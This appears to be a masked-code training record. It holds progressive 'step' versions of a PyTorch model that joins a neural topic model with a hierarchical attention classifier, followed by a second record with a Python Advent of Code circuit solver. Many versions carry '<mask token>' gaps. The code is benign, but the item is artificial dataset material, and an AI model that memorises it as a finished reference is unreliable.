nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n <mask token>\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n <mask token>\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith('selector'):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-4": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n\n def decoder(self, r):\n p_x_given_h = F.softmax(self.de(r))\n return p_x_given_h\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith('selector'):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n\n def forward(self, x, x_indices, input_list, length_list, cuda):\n mean, logvar = self.encoder(x)\n h = self.sampler(mean, logvar, cuda)\n r = self.generator(h)\n p_x_given_h = self.decoder(r)\n num_utterance = len(input_list)\n _, batch_size = input_list[0].size()\n word_rnn_hidden = self.init_rnn_hidden(batch_size, level='word')\n word_rnn_output_list = []\n word_attention_dict = {}\n for utterance_index in range(num_utterance):\n word_rnn_input = self.embedding(input_list[utterance_index])\n word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input,\n word_rnn_hidden)\n word_attention_weight = self.word_conv_attention_linear(\n word_rnn_output)\n batch_data = input_list[utterance_index]\n for word_i in range(len(batch_data)):\n for clause_i in range(len(batch_data[word_i])):\n word_index = int(batch_data[word_i, clause_i])\n if word_index < self.d_v:\n if word_index in word_attention_dict:\n word_attention_dict[word_index] = (\n word_attention_dict[word_index] +\n word_attention_weight[word_i, clause_i, :]) / 2\n else:\n word_attention_dict[word_index\n ] = word_attention_weight[word_i, clause_i, :]\n word_attention_weight = self.word_conv_attention_linear2(\n word_attention_weight)\n word_attention_weight = nn.functional.relu(word_attention_weight)\n word_attention_weight = nn.functional.softmax(word_attention_weight\n , dim=0)\n word_rnn_last_output = torch.mul(word_rnn_output,\n word_attention_weight).sum(dim=0)\n word_rnn_output_list.append(word_rnn_last_output)\n word_rnn_hidden = word_rnn_hidden.detach()\n context_rnn_hidden = self.init_rnn_hidden(batch_size, level='context')\n context_rnn_input = torch.stack(word_rnn_output_list, dim=0)\n context_rnn_output, context_rnn_hidden = self.context_rnn(\n context_rnn_input, context_rnn_hidden)\n context_attention_weight = self.context_conv_attention_linear(\n context_rnn_output)\n context_attention_weight = nn.functional.relu(context_attention_weight)\n context_attention_weight = nn.functional.softmax(\n context_attention_weight, dim=0)\n context_rnn_last_output = torch.mul(context_rnn_output,\n context_attention_weight).sum(dim=0)\n classifier_input = context_rnn_last_output\n logit = self.classifier(classifier_input)\n return mean, logvar, p_x_given_h, logit, word_attention_dict\n",
"step-5": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass JointModel(nn.Module):\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,encoder_shortcut, generator_shortcut, generator_transform,\n num_word, emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout, word_rnn_bidirectional,word_attention_size,\n context_rnn_size, context_rnn_num_layer, context_rnn_dropout, context_rnn_bidirectional,context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n\n super(JointModel, self).__init__()\n\n ##NGTM:\n self.d_v = d_v # vocabulary size\n self.d_e = d_e # dimensionality of encoder\n self.d_t = d_t # number of topics\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform # transform to apply after the generator\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n # self.mean_bn = nn.BatchNorm1d(self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n # self.logvar_bn = nn.BatchNorm1d(self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n # self.de_bn = nn.BatchNorm1d(self.d_v)\n\n ##HAN:\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=word_rnn_size, dropout=word_rnn_dropout,\n num_layers=word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = word_rnn_size * 2 if word_rnn_bidirectional else word_rnn_size\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size, self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size, hidden_size=context_rnn_size,dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=context_rnn_bidirectional)\n context_rnn_output_size = context_rnn_size * 2 if context_rnn_bidirectional else context_rnn_size\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size, 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size, mlp_size),\n nn.LeakyReLU(),\n nn.Linear(mlp_size, num_label),\n nn.Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(pretrained_embedding)\n\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n\n # mean = self.mean_bn(self.mean_fc(pi))\n # logvar = self.logvar_bn(self.logvar_fc(pi))\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n# temp = self.generator1(h)\n# if self.generator_shortcut:\n# r = F.tanh(temp) + h\n# else:\n# r = temp\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n\n def decoder(self, r):\n # p_x_given_h = F.softmax(self.de_bn(self.de(r)))\n p_x_given_h = F.softmax(self.de(r))\n return p_x_given_h\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == \"word\":\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size, self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == \"context\":\n bidirectional_multipier = 2 if self.context_rnn_bidirectional else 1\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size, self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith(\"selector\"):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith(\"selector\"):\n yield param\n\n def forward(self, x, x_indices, input_list, length_list, cuda):\n ###topic model\n mean, logvar = self.encoder(x) # batchsize*50\n h = self.sampler(mean, logvar, cuda) # batchsize*50\n r = self.generator(h) # batchsize*50\n p_x_given_h = self.decoder(r) # batchsize*dv\n ###HAN\n num_utterance = len(input_list) # one batch doucument_list\n _, batch_size = input_list[0].size()\n # word-level rnn\n word_rnn_hidden = self.init_rnn_hidden(batch_size, level=\"word\")\n word_rnn_output_list = []\n word_attention_dict = {}\n # de_weight = torch.zeros(self.d_v, self.d_t).cuda()\n # de_weight.copy_(self.de.weight.data)\n for utterance_index in range(num_utterance):\n word_rnn_input = self.embedding(input_list[utterance_index])\n word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input, word_rnn_hidden)\n word_attention_weight = self.word_conv_attention_linear(word_rnn_output)\n\n # word_attention_weight = Variable(torch.zeros(word_attention_weight.size()).cuda())\n batch_data = input_list[utterance_index]\n for word_i in range(len(batch_data)): # word_i word\n for clause_i in range(len(batch_data[word_i])): # clause_i data(batch)\n word_index = int(batch_data[word_i, clause_i]) # word index\n if word_index < self.d_v:\n if word_index in word_attention_dict:\n word_attention_dict[word_index] = (word_attention_dict[word_index] + word_attention_weight[word_i, clause_i,:]) / 2\n else:\n word_attention_dict[word_index] = word_attention_weight[word_i, clause_i, :]\n\n ##HAN\n word_attention_weight = self.word_conv_attention_linear2(word_attention_weight)\n word_attention_weight = nn.functional.relu(word_attention_weight)\n word_attention_weight = nn.functional.softmax(word_attention_weight, dim=0)\n word_rnn_last_output = torch.mul(word_rnn_output, word_attention_weight).sum(dim=0)\n word_rnn_output_list.append(word_rnn_last_output)\n word_rnn_hidden = word_rnn_hidden.detach()\n # context-level rnn\n context_rnn_hidden = self.init_rnn_hidden(batch_size, level=\"context\")\n context_rnn_input = torch.stack(word_rnn_output_list, dim=0)\n context_rnn_output, context_rnn_hidden = self.context_rnn(context_rnn_input, context_rnn_hidden)\n context_attention_weight = self.context_conv_attention_linear(context_rnn_output)\n context_attention_weight = nn.functional.relu(context_attention_weight)\n context_attention_weight = nn.functional.softmax(context_attention_weight, dim=0)\n context_rnn_last_output = torch.mul(context_rnn_output, context_attention_weight).sum(dim=0)\n classifier_input = context_rnn_last_output\n logit = self.classifier(classifier_input)\n\n return mean, logvar, p_x_given_h, logit, word_attention_dict",
"step-ids": [
5,
6,
8,
11,
12
]
}
|
[
5,
6,
8,
11,
12
] |
#!/usr/bin/env python3
import sys
import re
from collections import namedtuple
def isnum(name):
return name.startswith('-') or name.isdigit()
class WireValues:
def __init__(self):
self.wires = {}
def __getitem__(self, name):
return int(name) if isnum(name) else self.wires[name]
def __setitem__(self, name, value):
self.wires[name] = value
def __contains__(self, name):
return isnum(name) or name in self.wires
Command = namedtuple('Command', 'pattern function')
WireLink = namedtuple('WireLink', 'command inputs output')
COMMANDS = []
def make_command(expr):
pattern = re.compile('^'+expr.replace('#', '([0-9a-z]+)')+'$')
def command_maker(function):
command = Command(pattern, function)
COMMANDS.append(command)
return command
return command_maker
@make_command('# -> #')
def assignment(wires, v1, name):
wires[name] = wires[v1]
@make_command('# AND # -> #')
def anding(wires, v1, v2, name):
wires[name] = wires[v1] & wires[v2]
@make_command('# OR # -> #')
def oring(wires, v1, v2, name):
wires[name] = wires[v1] | wires[v2]
@make_command('# LSHIFT # -> #')
def lshift(wires, v1, v2, name):
wires[name] = wires[v1] << wires[v2]
@make_command('# RSHIFT # -> #')
def rshift(wires, v1, v2, name):
wires[name] = wires[v1] >> wires[v2]
@make_command('NOT # -> #')
def notting(wires, v1, name):
wires[name] = ((1<<16)-1)&~wires[v1]
def create_link(line):
for cmd in COMMANDS:
m = re.match(cmd.pattern, line)
if m:
gps = m.groups()
return WireLink(cmd, gps[:-1], gps[-1])
raise ValueError(repr(line))
def process_links(links):
wires = WireValues()
while links:
remaining = []
for link in links:
if all(i in wires for i in link.inputs):
link.command.function(wires, *link.inputs, link.output)
else:
remaining.append(link)
links = remaining
return wires
def main():
lines = sys.stdin.read().strip().split('\n')
links = [create_link(line) for line in lines]
wires = process_links(links)
answer = wires['a']
print("Part 1 wire a:", answer)
index = next(i for (i,link) in enumerate(links) if link.output=='b')
links[index] = WireLink(assignment, [str(answer)], 'b')
wires = process_links(links)
answer = wires['a']
print("Part 2 wire a:", answer)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "a5eb1f559972519dbe0f3702e03af77e61fbfb4e",
"index": 7985,
"step-1": "<mask token>\n\n\nclass WireValues:\n\n def __init__(self):\n self.wires = {}\n\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n\n def __setitem__(self, name, value):\n self.wires[name] = value\n\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\n\n<mask token>\n\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n\n<mask token>\n\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef isnum(name):\n return name.startswith('-') or name.isdigit()\n\n\nclass WireValues:\n\n def __init__(self):\n self.wires = {}\n\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n\n def __setitem__(self, name, value):\n self.wires[name] = value\n\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\n\n<mask token>\n\n\ndef make_command(expr):\n pattern = re.compile('^' + expr.replace('#', '([0-9a-z]+)') + '$')\n\n def command_maker(function):\n command = Command(pattern, function)\n COMMANDS.append(command)\n return command\n return command_maker\n\n\n@make_command('# -> #')\ndef assignment(wires, v1, name):\n wires[name] = wires[v1]\n\n\n@make_command('# AND # -> #')\ndef anding(wires, v1, v2, name):\n wires[name] = wires[v1] & wires[v2]\n\n\n<mask token>\n\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n\n@make_command('NOT # -> #')\ndef notting(wires, v1, name):\n wires[name] = (1 << 16) - 1 & ~wires[v1]\n\n\ndef create_link(line):\n for cmd in COMMANDS:\n m = re.match(cmd.pattern, line)\n if m:\n gps = m.groups()\n return WireLink(cmd, gps[:-1], gps[-1])\n raise ValueError(repr(line))\n\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\n\ndef main():\n lines = sys.stdin.read().strip().split('\\n')\n links = [create_link(line) for line in lines]\n wires = process_links(links)\n answer = wires['a']\n print('Part 1 wire a:', answer)\n index = next(i for i, link in enumerate(links) if link.output == 'b')\n links[index] = WireLink(assignment, [str(answer)], 'b')\n wires = process_links(links)\n answer = wires['a']\n print('Part 2 wire a:', answer)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef isnum(name):\n return name.startswith('-') or name.isdigit()\n\n\nclass WireValues:\n\n def __init__(self):\n self.wires = {}\n\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n\n def __setitem__(self, name, value):\n self.wires[name] = value\n\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\n\n<mask token>\n\n\ndef make_command(expr):\n pattern = re.compile('^' + expr.replace('#', '([0-9a-z]+)') + '$')\n\n def command_maker(function):\n command = Command(pattern, function)\n COMMANDS.append(command)\n return command\n return command_maker\n\n\n@make_command('# -> #')\ndef assignment(wires, v1, name):\n wires[name] = wires[v1]\n\n\n@make_command('# AND # -> #')\ndef anding(wires, v1, v2, name):\n wires[name] = wires[v1] & wires[v2]\n\n\n@make_command('# OR # -> #')\ndef oring(wires, v1, v2, name):\n wires[name] = wires[v1] | wires[v2]\n\n\n@make_command('# LSHIFT # -> #')\ndef lshift(wires, v1, v2, name):\n wires[name] = wires[v1] << wires[v2]\n\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n\n@make_command('NOT # -> #')\ndef notting(wires, v1, name):\n wires[name] = (1 << 16) - 1 & ~wires[v1]\n\n\ndef create_link(line):\n for cmd in COMMANDS:\n m = re.match(cmd.pattern, line)\n if m:\n gps = m.groups()\n return WireLink(cmd, gps[:-1], gps[-1])\n raise ValueError(repr(line))\n\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\n\ndef main():\n lines = sys.stdin.read().strip().split('\\n')\n links = [create_link(line) for line in lines]\n wires = process_links(links)\n answer = wires['a']\n print('Part 1 wire a:', answer)\n index = next(i for i, link in enumerate(links) if link.output == 'b')\n links[index] = WireLink(assignment, [str(answer)], 'b')\n wires = process_links(links)\n answer = wires['a']\n print('Part 2 wire a:', answer)\n\n\n<mask token>\n",
